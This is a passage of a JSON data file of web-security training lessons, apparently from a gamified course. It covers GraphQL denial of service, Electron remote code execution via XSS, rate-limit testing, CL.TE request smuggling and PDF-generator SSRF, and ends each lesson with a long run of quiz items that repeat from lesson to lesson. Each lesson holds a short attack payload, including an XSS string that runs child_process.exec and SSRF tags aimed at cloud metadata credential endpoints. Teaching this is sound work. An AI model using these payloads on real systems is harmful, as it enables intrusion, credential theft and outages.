understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"SSI injection executes commands via...","opts":["JavaScript","Server-side HTML comment directives","SQL queries","CSS"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1}]},{"id":"w-graphql-dos","cat":"Web Application","title":"GraphQL Denial of Service","diff":3,"xp":200,"intro":"Crash GraphQL servers with deeply nested or batched queries.","sections":[{"type":"text","content":"Unbounded query depth and no rate limiting on batch queries can exhaust server resources."},{"type":"code","lang":"bash","content":"# Deeply nested query\n{users{posts{comments{user{posts{comments{user{posts{comments}}}}}}}}}}\n# Batch query (bypass per-request limits)\n[{\"query\":\"{users{id}}\"},{\"query\":\"{users{id}}\"},{\"query\":\"{users{id}}\"}...x1000]"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"GraphQL DoS uses...","opts":["SQL injection","Deeply nested or batched queries exhausting resources","Buffer overflow","XSS"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0}]},{"id":"w-electron-rce","cat":"Web Application","title":"Electron App RCE via XSS","diff":4,"xp":250,"intro":"XSS in an Electron app = full system code execution.","sections":[{"type":"text","content":"Electron apps run with Node.js access. XSS in an Electron renderer process with nodeIntegration can call require('child_process').exec()."},{"type":"code","lang":"javascript","content":"// If nodeIntegration is enabled in the Electron renderer:\nrequire('child_process').exec('calc.exe');\n// Or via XSS in the app:\n<img src=x onerror=\"require('child_process').exec('id')\">"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Electron XSS is more dangerous than web XSS because...","opts":["It's faster","Electron has Node.js access = full system code execution","It uses HTTPS","It's encrypted"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1}]},{"id":"w-api-rate-limit-test","cat":"Web Application","title":"API Rate Limiting Assessment","diff":2,"xp":150,"intro":"Test if rate limiting actually works and find bypasses.","sections":[{"type":"text","content":"Send increasing request volumes and measure when/if throttling kicks in. Test bypass via: header rotation, parameter variation, and endpoint aliases."},{"type":"code","lang":"bash","content":"# Baseline: how many requests before throttle?\nfor i in $(seq 1 200); do\n  code=$(curl -s -o /dev/null -w '%{http_code}' https://api.target.com/login -d 'user=admin&pass=test')\n  echo \"$i: $code\"\n  [ \"$code\" = \"429\" ] && echo \"Throttled at $i\" && break\ndone"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Rate limit bypass via X-Forwarded-For works when the server...","opts":["Ignores it","Trusts it as the real client IP","Logs it","Encrypts it"],"ans":1},{"type":"quiz","q":"Input validation should happen...","opts":["Client only","Server only","Both client and server","Neither"],"ans":2},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0}]},{"id":"w-request-smuggling-cl-te","cat":"Web Application","title":"CL.TE Request Smuggling","diff":5,"xp":300,"intro":"Front-end uses Content-Length, back-end uses Transfer-Encoding.","sections":[{"type":"text","content":"When the front-end proxy reads Content-Length but the back-end reads Transfer-Encoding, the disagreement lets you smuggle a second request inside the first."},{"type":"code","lang":"http","content":"POST / HTTP/1.1\nHost: target.com\nContent-Length: 6\nTransfer-Encoding: chunked\n\n0\n\nG"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CL.TE smuggling means...","opts":["Both use CL","Front-end uses Content-Length, back-end uses Transfer-Encoding","Both use TE","Neither parses headers"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1}]},{"id":"w-pdf-ssrf","cat":"Web Application","title":"PDF Generation SSRF","diff":4,"xp":250,"intro":"Inject URLs into PDF generators to trigger server-side requests.","sections":[{"type":"text","content":"HTML-to-PDF converters (wkhtmltopdf, Puppeteer) fetch external resources. Inject links to internal URLs or cloud metadata endpoints."},{"type":"code","lang":"bash","content":"# Inject into a field that appears in a generated PDF\n<iframe src='http://169.254.169.254/latest/meta-data/'></iframe>\n<img src='http://internal-server:8080/admin'>\n<link rel='stylesheet' href='http://169.254.169.254/latest/meta-data/iam/security-credentials/'>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"PDF SSRF works because the PDF generator...","opts":["Is offline","Fetches external resources from the server's network context","Uses encryption","Runs client-side"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"HTTP default port is...","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"robots.txt reveals...","opts":["Passwords","Directories hidden from crawlers","Vulnerabilities","Keys"],"ans":1},{"type":"quiz","q":"HTTPS uses...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A WAF is a...","opts":["Network firewall","Web Application Firewall","Wireless tool","VPN"],"ans":1},{"type":"quiz","q":"SameSite cookie prevents...","opts":["XSS","CSRF","SQLi","Clickjacking"],"ans":1},{"type":"quiz","q":"OPTIONS method reveals...","opts":["Secrets","Allowed HTTP methods","User data","Schema"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP?","opts":["nmap","Burp Suite","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Secure cookie flags include...","opts":["Secure, HttpOnly, SameSite","Public, Readable","Debug, Verbose","None"],"ans":0},{"type":"quiz","q":"URL encoding converts...","opts":["HTML to text","Special chars to %XX","Images to text","Binary to hex"],"ans":1},{"type":"quiz","q":"HTTP 302 means...","opts":["OK","Not found","Temporary redirect","Server error"],"ans":2},{"type":"quiz","q":"DOM stands for...","opts":["Data Object Model","Document Object Model","Direct Output Method","Dynamic Mode"],"ans":1},{"type":"quiz","q":"Content-Type header specifies...","opts":["Authentication","The format of the request/response body","Cache settings","Encoding"],"ans":1},{"type":"quiz","q":"What does URL encoding of ' produce?","opts":["%27","%22","%3C","%3E"],"ans":0},{"type":"quiz","q":"X-Frame-Options prevents...","opts":["XSS","Clickjacking (iframe embedding)","SQLi","CSRF"],"ans":1}]}]